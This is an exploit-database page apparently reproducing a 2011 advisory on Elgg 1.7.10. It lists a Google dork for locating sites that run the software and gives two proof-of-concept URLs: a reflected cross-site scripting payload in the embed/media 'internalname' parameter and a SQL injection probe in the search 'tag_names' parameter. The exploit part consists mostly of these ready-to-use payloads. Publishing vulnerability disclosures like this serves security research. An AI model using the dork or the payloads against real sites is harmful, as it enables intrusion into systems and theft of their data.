[] NeoSense
E X P L O I T S
title author type platform port cve id

Elgg 1.7.10 - Multiple Vulnerabilities

Author: Aung Khant
type: webapps
platform: php
port: 
date_added: 2011-08-18 
date_updated: 2011-08-18 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comelgg-1.7.10.zip
# Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities
# Google Dork: intext:"Powered by Elgg, the leading open source social
networking platform"
# Date: 2011-08-18
# Author: Aung Khant <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip
# Version: 1.7.10 <=


1.  XSS

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22



2. SQL Injection

http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.